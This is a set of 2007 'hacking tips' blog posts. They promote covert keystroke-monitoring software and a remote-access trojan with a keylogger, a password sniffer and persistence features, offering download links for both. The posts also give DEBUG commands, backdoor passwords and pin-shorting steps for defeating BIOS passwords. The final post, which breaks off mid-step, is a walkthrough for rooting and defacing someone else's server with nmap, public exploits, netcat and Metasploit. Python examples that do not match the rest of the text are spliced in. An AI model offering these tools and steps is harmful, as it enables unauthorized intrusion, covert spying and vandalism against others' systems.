In addition to monitoring and recording, Spector Pro has an advanced warning system that will inform you when a PC being monitored has been used in an inappropriate manner. Through the use of keywords and phrases that you specify, Spector Pro will be "on alert", emailing you an immediate and detailed report of when, where and how a keyword was used - every time it is typed or appears on the PC, on a web site, in a chat/instant message or in an email. Alerts are sent to your office, home, cell phone or wherever you want.
Complete Power. Complete Flexibility. You are in Control.
Spector Pro has become the gold standard in Internet monitoring software because of its ease of installation and use, and its comprehensive recording capabilities of just about every kind of Internet activity. With Spector Pro you will know who is using your PC, what they are doing online and ultimately... take back control of your home or office computer.
Want to read more about this product? Click here.
To buy this software, click here.
Download this software: "Click here to download v5.0" (download link provided by SkillWare)
Download this software: "Click here to download v6.0" (download link provided by Download Planet)
Posted by Venkatesh Vedhakumar at Monday, July 09, 2007
Labels: Hacking tips, Windows tips and tricks
Saturday, July 7, 2007
Flux Hacking Kit v1.0
This is the first release of a remote administration tool named Flux.
This application allows you to administer a remote computer, even one behind a router or protected by a firewall.
Features:
- FWBP+ (can inject into the default browser, MSN Messenger or up to three specified applications)
- Persistent server (the server is hard to remove: it is rerun when closed, rewritten when deleted, and re-added to the registry when removed)
- Startup method: Registry Run key + ActiveX + Flux-special
- Installs to the Windows or System directory
- Up to three specified ports in the client can listen for connections
- Up to three specified IPs can be used for connection
- Up to three specified URLs can be used to connect to
- File manager (uses caches to speed up browsing, supports download resuming)
- Screen capture, using either JPEG compression or diff calculation to stream the user's desktop (both included in the basic server)
- Cam capture (optionally saves captures)
- Keylogger (optionally logs in the background)
- Password sniffer (logs all text entered into password/*** boxes)
- Find files
- Task list (can capture a certain window or control)
- Process list
- SOCKS4
- Show message box
- Execute file from URL
- Connection is encrypted with a 1024-bit key
Download
Add-on
Posted by Venkatesh Vedhakumar at Saturday, July 07, 2007
Labels: Hacking tips
Tuesday, June 12, 2007
Clear BIOS Password, All tricks !
At the command prompt type debug.
You will get a "-" prompt, where you type the following, pressing Enter after each line (<enter> below means press the Enter key on an empty line, not type the word):
A
MOV AX,0
MOV AX,CX
OUT 70,AL
MOV AX,0
OUT 71,AL
INC CX
CMP CX,100
JB 103
INT 20
<enter>
G
Q
What this does: A assembles the instructions starting at offset 100. OUT 70,AL selects a CMOS register by the index in CX (DEBUG starts with CX at 0), OUT 71,AL writes zero into it, and INC CX / CMP CX,100 / JB 103 jump back to the MOV AX,CX at offset 103 until every index from 0 through FFh has been written, so the whole CMOS area, password bytes included, is zeroed. The empty line ends assembly, G runs the program, and Q quits DEBUG.
Basic BIOS password crack - works 9.9 times out of ten
This is a password hack, but it clears the BIOS so that the next time you start the PC, the CMOS does not ask for any password. If you are able to bring up the DOS prompt, you will be able to reset the BIOS settings to the defaults. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.
Accessing information on the hard disk
When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.
Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a BIOS password is to try one of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %шесть пробелов%, %девять пробелов%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated with "_" on the US keyboard corresponds to "?" on some European keyboards (such as Italian and German ones), so, for example, you should type AWARD?SW when using those keyboards. Also remember that passwords are case sensitive. The last two entries in the AWARD BIOS list are in Russian: they mean "six spaces" and "nine spaces", i.e. the password is made up of spaces only.
Flashing BIOS via software
If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, you may not have one of those programs at hand when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt; you'd better do it in pure MS-DOS mode, not from an MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.
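As an added example (not code from this post), here is a small Python model of why those two OUT instructions are enough: port 70h selects a CMOS register and port 71h writes it, and on the classic AT layout a 16-bit checksum of registers 10h-2Dh is kept at 2Eh-2Fh. The register map and the sample CMOS contents are constructed for illustration; real boards differ, and a modern BIOS may cover more than this range.

```python
# Constructed model of AT-class CMOS RAM behind the 0x70 (index) / 0x71 (data)
# port pair. When the stored checksum no longer matches the configuration
# bytes, POST reports a checksum error and reloads factory defaults, which
# is where the setup password goes as well.

CHECKSUM_FIRST, CHECKSUM_LAST = 0x10, 0x2D   # registers covered by the checksum
CHECKSUM_HI, CHECKSUM_LO = 0x2E, 0x2F        # where the checksum is stored (big-endian)


class Cmos:
    """64 bytes of CMOS RAM reachable only through the index/data ports."""

    def __init__(self, image: bytes) -> None:
        if len(image) != 64:
            raise ValueError("AT-class CMOS RAM is 64 bytes")
        self.ram = bytearray(image)
        self.index = 0          # last value written to port 0x70

    def out(self, port: int, value: int) -> None:
        """Emulate an OUT instruction (what DEBUG's 'O port value' does)."""
        value &= 0xFF
        if port == 0x70:
            self.index = value & 0x7F       # bit 7 is the NMI-disable flag, not index
        elif port == 0x71:
            self.ram[self.index & 0x3F] = value
        else:
            raise ValueError(f"not a CMOS port: {port:#x}")

    def expected_checksum(self) -> int:
        return sum(self.ram[CHECKSUM_FIRST:CHECKSUM_LAST + 1]) & 0xFFFF

    def stored_checksum(self) -> int:
        return (self.ram[CHECKSUM_HI] << 8) | self.ram[CHECKSUM_LO]

    def checksum_ok(self) -> bool:
        return self.expected_checksum() == self.stored_checksum()


def fresh_cmos(config: bytes) -> Cmos:
    """Build a CMOS image whose stored checksum matches its configuration bytes."""
    ram = bytearray(64)
    ram[CHECKSUM_FIRST:CHECKSUM_FIRST + len(config)] = config
    total = sum(ram[CHECKSUM_FIRST:CHECKSUM_LAST + 1]) & 0xFFFF
    ram[CHECKSUM_HI], ram[CHECKSUM_LO] = total >> 8, total & 0xFF
    return Cmos(bytes(ram))


def run_debug_script(cmos: Cmos, script: str) -> list:
    """Apply the 'O port value' lines of a DEBUG transcript; returns the registers written."""
    touched = []
    for line in script.splitlines():
        parts = line.strip().lstrip("-").split()   # tolerate a pasted '-' prompt
        if len(parts) == 3 and parts[0].upper() == "O":
            port, value = int(parts[1], 16), int(parts[2], 16)
            if port == 0x71:
                touched.append(cmos.index)
            cmos.out(port, value)
        elif parts and parts[0].upper() == "Q":
            break
    return touched


# Constructed configuration bytes (floppy type, disk type, equipment, memory sizes...).
SAMPLE_CONFIG = bytes([0x40, 0x00, 0x0F, 0x3D, 0x80, 0x02, 0x00, 0x3C])

GENERIC_SCRIPT = "O 70 2E\nO 71 FF\nQ\n"    # the "GENERIC" script from the text


def demo() -> tuple:
    """(checksum valid before, registers written, checksum valid after)."""
    cmos = fresh_cmos(SAMPLE_CONFIG)
    before = cmos.checksum_ok()
    touched = run_debug_script(cmos, GENERIC_SCRIPT)
    return before, touched, cmos.checksum_ok()


if __name__ == "__main__":
    print(demo())   # (True, [46], False): one byte written and the checksum no longer verifies
```

The same check explains the AMI/AWARD variant: writing 17h to register 17h lands inside the summed range, so the stored checksum is stale unless that byte already held 17h.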
Flashing BIOS via hardware
If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before trying any of these methods.
Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (by "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins; you then unplug the jumper and plug it onto the central pin and the pin on the opposite side, so if the jumper is normally in position 1-2, you put it in position 2-3, or vice versa). This jumper is not always located near the BIOS, but could be anywhere on the motherboard.
To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending on what the manual says) while the computer is turned OFF. Wait a couple of seconds, then put the jumper back in its original position. On some motherboards the computer may turn itself on automatically after flashing the BIOS. In this case, turn it off, put the jumper back in its original position, then turn it on again. Other motherboards require you to turn the computer on for a few seconds to flash the BIOS.
If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near the BIOS, and the ones you can switch (as explained above). If all of them fail, try all the others. However, you must change the state of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you changed is actually meant for). If the password request screen still appears, try another one.
If after flashing the BIOS the computer won't boot when you turn it on, turn it off and wait some seconds before retrying.
Removing the battery
If you can't find the jumper to flash the BIOS, or if no such jumper exists, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on older computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but it usually has a jumper on its side to disconnect it; otherwise you'll have to unsolder it and then solder it back). Take it out for 15-30 minutes or more, then put it back, and the data held in the BIOS memory should be lost. I'd suggest removing it for about one hour to be sure, because if you put it back before the data is erased you'll have to wait the whole time again, as if you had never removed it. If at first it doesn't work, try removing the battery overnight.
Important note: on laptops and notebooks it is useless to remove the computer's power batteries; you have to open the computer and remove the CMOS battery from the motherboard.
Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short-circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before trying this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If the BIOS chip you are working on matches one of the following, you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)
Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
[Pinout sketch of the CHIPS P82C206 (square package): pin 1 marked on the left edge, pins 12 (gnd) and 32 (5v) at the two ends of the bottom edge, pins 74 (gnd) and 75 (5v) at the upper left corner.]
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
[Pinout sketch of the OPTi F82C206 (rectangular package): pins 1 and 30 at the bottom corners with pins 3 and 26 between them on the bottom edge, pins 31 and 100 on the sides, pins 50, 51, 80 and 81 around the top edge.]
Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips, have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip has to be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
            __________
     1 -| *   U    |- 24 5v
     2 -|          |- 23
     3 -|          |- 22
     4 -|          |- 21 RCL (RAM Clear)
     5 -|          |- 20
     6 -|          |- 19
     7 -|          |- 18
     8 -|          |- 17
     9 -|          |- 16
    10 -|          |- 15
    11 -|          |- 14
gnd 12 -|__________|- 13
NOTE: Although these are 24-pin chips, the Dallas chips may be missing 5 pins; these are unused pins. Most chips have unused pins, though usually they are still present.
Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
[Pinout sketch of the DS12885S package: pin 1 (gnd) at the lower left, pin 12 at the lower right, pin 24 (5v) at the upper left, pins 20 and 13 along the top edge.]
Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
            __________
     1 -| *   U    |- 24 5v
     2 -|          |- 23
     3 -|          |- 22
     4 -|          |- 21
     5 -|          |- 20
     6 -|          |- 19
     7 -|          |- 18
     8 -|          |- 17
     9 -|          |- 16
    10 -|          |- 15
    11 -|          |- 14
gnd 12 -|__________|- 13
Replacing the chip
If nothing works, you could replace the existing BIOS chip with a new one bought from a specialized electronics shop or your computer supplier. It's a quick operation if the chip sits in a socket and is not soldered to the motherboard; otherwise you'll have to unsolder it and then solder in the new one. In that case it would be more convenient to solder in a socket into which you then plug the new chip, in case you have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of those shown above) and look on your motherboard manufacturer's website to see if there's a BIOS image to download. Then you should copy that image onto the chip you bought with an EPROM programmer.
Important
Whichever method you use, when you flash the BIOS not only the password but also all the other configuration data is reset to the factory defaults, so when you boot for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may find some new device because of the new BIOS configuration; in this case you'll probably need the Windows installation CD, because Windows may ask you for some external files. If Windows doesn't see the CD-ROM, try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive even though you set it properly in the BIOS config, just reboot with the reset key, and on the next run Windows should find it. However, most files needed by the system while installing new hardware can also be found in C:\WINDOWS, C:\WINDOWS\SYSTEM, or C:\WINDOWS\INF.
Key Disk for Toshiba laptops
Some Toshiba notebooks allow you to bypass the BIOS password by inserting a "key disk" in the floppy disk drive while booting. To create a Toshiba key disk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" followed by two zeroes). Once you have created the key disk, put it into the notebook's drive and turn it on, then push the reset button, and when asked for the password press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration, where you can set a new password.
Key protected cases
A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.
That's all.
Clear CMOS, jumper. That is the way I solve the problem when a customer forgets the password.
More
There are a few different ways to reset the CMOS; here are a few:
1. There are many default common passwords. At boot-up, note the BIOS provider (Award, AMI, Phoenix, IBM, etc.).
For Award BIOSes try these backdoor passwords:
AWARD_SW
j262
HLT
SER
SKY_FOX
BIOSTAR
ALFAROME
Lkwpeter
j256
AWARD?SW
LKWPETER
syxz
ALLy
589589
589721
awkward
CONCAT
d8on
CONDO
j64
szyx
For AMI BIOSes try these backdoor passwords:
AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
A.M.I.
CONDO
For PHOENIX BIOSes try this backdoor password:
phoenix
There are too many to count; here's a list:
http://www.phenoelit.de/dpl/dpl.html
(search for PC BIOS)
2. On some older PCs, pressing the Insert key on startup will clear the CMOS; make sure you hold it down until it's done booting.
3. Another way, which we pretty much already covered, is to pull the metallic, nickel-looking battery that supplies power to the CMOS.
4. Sometimes there is a small three-pin jumper used to reset the BIOS; just move the little black pin cover to the opposite two pins. (Make sure to read the motherboard's manual before doing this.)
5. If the battery is soldered in, you can take a soldering iron to it, but I don't recommend it unless you are a professional.
6. There are a few programs out on the net which are made to crack certain types of BIOS passwords. I have one for Award BIOSes; here are a couple:
http://www.11a.nu/ibios.htm
http://natan.zejn.si/rempass.html
Good reading:
http://www.astalavista.com/library/...ios_hacking.txt
http://www.virtualplastic.net/html/misc_bios.html
Tools:
http://www.red-demon.com/pwrecovery.htm
Posted by Venkatesh Vedhakumar at Tuesday, June 12, 2007
Labels: Hacking tips
Tuesday, June 5, 2007
Hacking
ETHICS & HUMOR
Name | Description | Size
Hackers Manifest | The hackers manifest by the Mentor. Every hacker should know this | 1,755 bytes
Diary of a hacker | Duh... | 13,226 bytes
Hacker Ethics | What is a hacker? | 2,777 bytes
Are you a hacker? | See if you fit this description... | 784 bytes
How I knew when I was a hacker | Another file on being a hacker | 2,585 bytes
A Guide to Internet Security: Becoming an Uebercracker and Becoming an UeberAdmin to stop Uebercrackers | A joke, not to be taken seriously (unless you want to go to jail, of course...) | 4,035 bytes
Concerning Hackers Who Break into Computer Systems | File on hackers by a sysop who's sympathetic to hackers | 22,914 bytes
Zero Tolerance | Book on bad ass mother fuckers in the old days | 181,467 bytes
The Hacker Crackdown | Good book that describes the hacker crackdown of 1991 | 275,654 bytes
Ethics Of A True Hacker | Recent file written by The Mob Boss about hacking ethics. Nice | 2,952 bytes
The Mob Boss's Guide To Hacking | Guide for beginner hackers on how to start by The Mob Boss. Read this if you're just starting | 12,224 bytes
Psychological Profile Of The Troubled Female Teen | Funny file on how to hack girls. Read it for a laugh | 5,143 bytes
How To Be A Hacker | File that explains the hacker mentality. Nice one | 11,834 bytes
Humor | Teaches you how to be 31337 | 15,613 bytes
UNIX
Name | Description | Size
Hackers Kit | Explains UNIX security all round and shows a few basic old bugs. Also has a root kit. This was the file that taught me the basics of hacking UNIX | 295,129 bytes
Unix Computer Security Checklist | Security holes to look out for when hacking a system | 26,429 bytes
Improving the Security of Your Site by Breaking Into it | Nice (old) paper on common holes | 20,827 bytes
Unix: A Hacking Tutorial | Well written file on the basics of unix | 37,944 bytes
Millenium Hacking | A file written to show people what hacking was like at the end of the 20th century. Basic, but good for beginners | 368,329 bytes
Unix for Intermediate Users | Not so much a hacking file, just explains the basics of unix. | 71,758 bytes
Crash Course In X Windows Security | Explains the basics of X Windows security | 5,449 bytes
Playing with the Internet Daemons | Old file explaining bugs in daemons, good for beginner hackers to get an idea about what security holes are | 6,467 bytes
Secure UNIX programming FAQ | Explains the basics on how to code safely in UNIX | 21,211 bytes
NFS Tracing By Passive Network Monitoring | Good read if you're interested in NFS | 12,368 bytes
Linux Administrators Security Guide | THE linux security resource (PDF) | 273,688 bytes
Securing and Optimising Red Hat Linux | I cannot praise this enough. 475 pages of how to secure your redhat box properly. READ IT!!! (PDF) | 2,468,188 bytes
Kernel hacking made easy | Short tutorial that provides a nice introduction to kernel system calls | 3,796 bytes
Coding with the DNS protocol | Short tutorial on coding with DNS | 8,740 bytes
Linux Firewalling - Insights and Explanations... | Read this and learn a bit about firewalls | 5,358 bytes
A Lab engineers check list for writing secure Unix code | Paper that explains a few things you can do to code more secure programs in Unix | 8,106 bytes
SOCKETS
Name | Description | Size
BSD Sockets: A Quick And Dirty Primer | This is a short tutorial that explains what sockets are, how they work, and gives sample code showing how to use them. | 486,960 bytes
A brief programming tutorial in C for raw sockets | Teaches the basics of using raw sockets in C, to insert any IP protocol based datagram into the network traffic. | 7,309 bytes
CRACKING
Name | Description | Size
How To Crack | Good file that teaches the basics of cracking | 122,376 bytes
The Ancient Art Of Cracking | Another excellent file on cracking | 68,917 bytes
BUFFER OVERFLOWS
Name | Description | Size
How to write buffer overflows | File that explains how to write buffer overflows | 7,195 bytes
Smashing The Stack For Fun And Profit | Excellent file that explains buffer overflows | 15,191 bytes
Exploiting Windows NT 4 Buffer Overruns | By far the best file I've found that explains buffer overflows in NT | 12,629 bytes
Writing buffer overflow exploits - a tutorial for beginners | Short and sweet tutorial | 8,916 bytes
Libsafe: Protecting Critical Elements of Stacks | Nice whitepaper that explains buffer overflows and what libsafe does (PDF) | 177,423 bytes
Buffer Overrun Attacks | Explains what buffer overflows are. Good for beginners (PDF) | 387,028 bytes
Advanced buffer overflow exploit | Shows all the cool stuff you can do once you've found a buffer overflow | 9,169 bytes
Compromised - Buffer Overflows, from Intel to SPARC Version 8 | Talks about what buffer overflows are, why they work and how to approach them. Again, a good file for beginners | 19,141 bytes
w00w00 on Heap Overflows | Nice and sweet tutorial on heap-based buffer overflows | 13,408 bytes
NOVELL NETWARE
Name | Description | Size
The unofficial netware Hack FAQ | Everything you wanted to know about netware | 41,634 bytes
DENIAL OF SERVICE
Name | Description | Size
Introduction to denial of service | Intro on denial of service attacks | 17,459 bytes
Protecting Routing Infrastructures from Denial Of Service Using Cooperative Intrusion Detection | Whitepaper that explains a method to combat DoS attacks. Interesting read (PDF) | 118,400 bytes
CGI
Name | Description | Size
Safe CGI Programming | Nice little paper that explains the basics for writing safe CGI code | 6,456 bytes
CODING
Name | Description | Size
C Programming | Nice and sweet C tutorial | 200,316 bytes
MISCELLANEOUS
Name | Description | Size
Modern Hackers Deskreference | Reference file with things that every hacker should know. Contains info on WindowsNT security issues, Unix, Linux, Irix, Vax, Router configuration, Frontpage, Wingate and much much more. READ IT | 182,301 bytes
Common Insecurities Fail Scrutiny | Explains Netbios & Samba bugs and how to exploit them | 46,313 bytes
Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks | Explains the basics on how to hack a system from a system administrator's point of view (VERY basic) | 12,027 bytes
The unofficial Web Hack FAQ | Nice things to do with the web | 54,000 bytes
Simple Active Attack Against TCP | This paper describes an active attack against the Transport Control Protocol (TCP) which allows a cracker to redirect the TCP stream through his machine, thereby permitting him to bypass the protection offered by such a system as a one-time password [skey] or ticketing authentication [kerberos] | 14,302 bytes
Introduction to the Internet Protocols | This is an introduction to the Internet networking protocols (TCP/IP). It includes a summary of the facilities available and brief descriptions of the major protocols in the family | 30,737 bytes
The Hackers Handbook | May be old, but an excellent read nonetheless. Read it to understand the basics and a bit of hacker history | 127,015 bytes
PORTSCANNING
Name | Description | Size
Practical Automated Detection Of Stealthy Portscans (PDF) | Explains how to detect portscans. Although meant for people trying to protect their systems, it explains some of the techniques portscanners use to remain undetected. | 151,603 bytes
ICMP Usage In Scanning (PDF) | Paper that describes what information can be gained from a target network using ICMP. Well written and DEFINITELY worth a read if you're a beginner. | 434,372 bytes
WINDOWS NT
Name | Description | Size
The unofficial NT Hack FAQ | Basics on NT security | 44,622 bytes
Wardoc | This document is an attempt by the Rhino9 team to document the methodology and techniques used in an attack on an NT based network. The intent of this document is to educate administrators and security professionals about both the mindset of an attacker and a large set of the current NT penetration techniques. This document attempts to follow in the footsteps of the classic text, "How To Improve The Security Of Your Site by Breaking Into It" by Dan Farmer and Wietse Venema. Obviously, this text will not contain all known methods for NT network penetration | 28,388 bytes
Understanding Microsoft Proxy Server 2.0 | This document was not made for people who have been working with Microsoft Proxy Server since its beta (catapult) days. It is made for individuals who are curious about the product and security professionals who are curious as to what Microsoft Proxy Server has to offer. This document is also being written for individuals who have a general idea of what a Proxy Server does, but want to know more. This paper goes into discussion of Proxy Server Features and Architecture, Access Control, Encryption, and Firewall Strategies (which I have been getting a lot of requests for) | 10,971 bytes
Analysis of the Security of Windows NT | Interesting paper about Windows NT security (PDF) | 417,510 bytes
A *REAL* NT Rootkit, patching the NT Kernel | Nice tutorial that explains how to patch NT to do what you want it to do | 17,304 bytes
VAX
Name | Description | Size
Vax Hacking FAQ | The only file that I could find that deals singularly with VAXEN. So it'll have to do. Never used a VAX before, so I can't vouch for this file | 21,823 bytes
A Practical Exercise in Securing an OpenVMS System | This paper deals with securing VMS. As I've never used OpenVMS I can't vouch for this one either | 32,650 bytes
RAINBOW BOOKS
Colour | Description | Size
Aqua | Glossary of Computer Security Acronyms | 21,415 bytes
Blue | Trusted Product Evaluation Questionnaire | 18,197 bytes
Brown | Guide to Understanding Trusted Facility Management | 29,060 bytes
Burgundy | A Guide To Understanding Design Documentation | 20,543 bytes
Dark Lavender | A Guide To Understanding Trusted Distribution in Trusted Systems | 17,502 bytes
Green | DoD Password Management Guideline | 18,690 bytes
Grey | TRUSIX Rationale for Selecting Access Control List Features For The Unix System | 38,835 bytes
Light Blue | A Guide To Understanding I & A | 18,101 bytes
Orange | DoD Trusted Computer System Evaluation Criteria | 63,911 bytes
Another Orange | A Guide To Understanding Configuration Management in Trusted Systems | 42,462 bytes
Peach | A Guide To Writing the Security Features User's Guide for Trusted Systems | 16,576 bytes
Pink | Rating Maintenance Phase Program | 26,257 bytes
Purple | Guidelines for Formal Verification Systems | 17,667 bytes
Red | Trusted Network Interpretation | 246,679 bytes
Another Red | Trusted Network Interpretation Environments Guideline | 37,272 bytes
Venice Blue | Computer Security Subsystems | 18,251 bytes
Yellow | Guide For Applying the DoD Trusted Computer System Evaluation Criteria In Specific Environments | 21,420 bytes
Contents of this post are taken from http://www.xs4all.nl/~l0rd/hack.htm
Posted by Venkatesh Vedhakumar at Tuesday, June 05, 2007
Labels: Hacking tips
Rooting
An article on gaining root to a remote system:
Too often have I seen articles that claim to teach how to hack into a server, but all they do is show you how to scan open ports, and many people have no idea what to do with an open port. So I am going to show you pretty much all the basics, to get you well on your way to your first ever successful hack of a server, giving you root privileges.
First tool that you will need is a good port scanner. Nmap and SuperScan are my favourites by far, and Nmap is by far the most popular port scanner in the world because of its many features. You can download both at: http://www.hackinglibrary.ws/dl/downloads/superscan4.zip and http://insecure.org/nmap/
SuperScan: If you have a website that you mainly want to target, then just copy and paste the URL into the box and click lookup. It will automatically determine the IP address, and with this you can simply scan away.
Nmap: Nmap is used entirely through the CLI (Command Line Interface). To determine the IP address of a website, just run a WHOIS on it; http://whois.domaintools.com is the best one I know of and has many features, and also check out http://www.dnsstuff.com/, which is also very useful and has many features. So if you simply typed "nmap 192.168.1.1" (changing the IP you see here to the target's IP address) it will scan the target for open ports, and adding -O will fingerprint the OS the remote system is using.
Once you have your port list at hand, you will need to find out which program each port is running, and the best manual way to do this is to connect to each port through telnet. When you are connected, you will be welcomed by a screen with some information; if you copy and paste all this information into a .txt file, and do this for each port, it will become clear which programs run on which ports, and you will also be able to see whether it has the latest versions of the software (remember that new versions come out that secure the program more, so if the program is an extremely old version it is more likely to be exploitable).
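The same bookkeeping, done in code rather than in a .txt file, is what an administrator runs against their own hosts to find outdated services before anyone else does. This is an added example, not code from the article: the banners, the regexes and the "oldest acceptable version" baseline are all constructed for illustration.

```python
import re

# Constructed banners, one per port, as you would paste them from telnet sessions.
BANNERS = {
    21: "220 ProFTPD 1.3.0 Server (Debian) [::ffff:192.0.2.10]",
    22: "SSH-2.0-OpenSSH_4.3p2 Debian-9",
    25: "220 mail.example.test ESMTP Sendmail 8.13.8/8.13.8; Tue, 5 Jun 2007",
    80: "HTTP/1.1 200 OK\r\nServer: Apache/2.2.3 (Debian)\r\n",
    110: "+OK Dovecot ready.",
}

# Constructed baseline: the oldest version of each product you still accept.
BASELINE = {
    "ProFTPD": "1.3.1",
    "OpenSSH": "4.7",
    "Sendmail": "8.14.0",
    "Apache": "2.2.4",
}

# One pattern per product; the capture group, where present, is the version.
PATTERNS = [
    ("ProFTPD", re.compile(r"ProFTPD (\d+(?:\.\d+)+)")),
    ("OpenSSH", re.compile(r"OpenSSH_(\d+(?:\.\d+)+)")),
    ("Sendmail", re.compile(r"Sendmail (\d+(?:\.\d+)+)")),
    ("Apache", re.compile(r"Apache/(\d+(?:\.\d+)+)")),
    ("Dovecot", re.compile(r"Dovecot")),      # banner carries no version at all
]


def version_key(version: str) -> tuple:
    """'1.3.0' -> (1, 3, 0), so versions compare numerically rather than as strings."""
    return tuple(int(part) for part in version.split("."))


def identify(banner: str):
    """Return (product, version or None) for a banner, or None if unrecognised."""
    for product, pattern in PATTERNS:
        m = pattern.search(banner)
        if m:
            return product, (m.group(1) if m.groups() else None)
    return None


def inventory(banners: dict) -> list:
    """Rows of (port, product, version, status), one per banner, sorted by port."""
    rows = []
    for port in sorted(banners):
        found = identify(banners[port])
        if found is None:
            rows.append((port, "unknown", None, "review"))
            continue
        product, version = found
        floor = BASELINE.get(product)
        if version is None:
            status = "unknown version"          # needs a closer look, not a verdict
        elif floor is None:
            status = "no baseline"
        elif version_key(version) < version_key(floor):
            status = f"outdated (< {floor})"
        else:
            status = "ok"
        rows.append((port, product, version, status))
    return rows


def outdated_ports(banners: dict) -> list:
    """Ports whose service is below the baseline; these go to the patch queue first."""
    return [port for port, _, _, status in inventory(banners) if status.startswith("outdated")]


if __name__ == "__main__":
    for port, product, version, status in inventory(BANNERS):
        print("%5d  %-9s %-8s %s" % (port, product, version or "-", status))
```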
Once you have done this and got a list of all the programs running on the open ports, now is the time to search for an exploit. There are many ways to do this:
Milw0rm is an old favourite of mine, http://www.milw0rm.com. If you go to http://www.milw0rm.com/port.php it will give you a drop-down menu of ports; just look through each one, check whether the exploits for the programs there match any of the programs in your .txt file, and finally check the versions. If you see an exploit there, click on it. If it's a Perl exploit (it will start with #!/usr/bin/perl) this is even better, because it means you don't have to mess about compiling the exploit. If not, you will have to compile the exploit yourself; look up another article for this, but you will need cygwin if you are running Windows. All you have to do is run the command "pl exploit.pl [target]", and if you're lucky it will be successful and all you need do now is connect through netcat (the hacker's best friend, an alternative to telnet) and you will have root privileges. Or, if the payload is a reverse bind, your computer may open another terminal automatically with root rights. Now you may go to the directory that the site is stored in (usually /home/site here) and you can do whatever you feel to the site in question.
Metasploit is another great method. You can download metasploit from: http://framework.metasploit.com/msf/download
Now once you have this, run it (msfconsole) and type "show exploits" this will give you a list of all the exploits in metasploit's library. Look for one that exploits one of the port's programs you found, and when you find it, type "use [exploit here]"
Now, "show targets" this will give you a list of targets, just set it to the OS you found while fingerprinting it with Nmap, type "set target x"
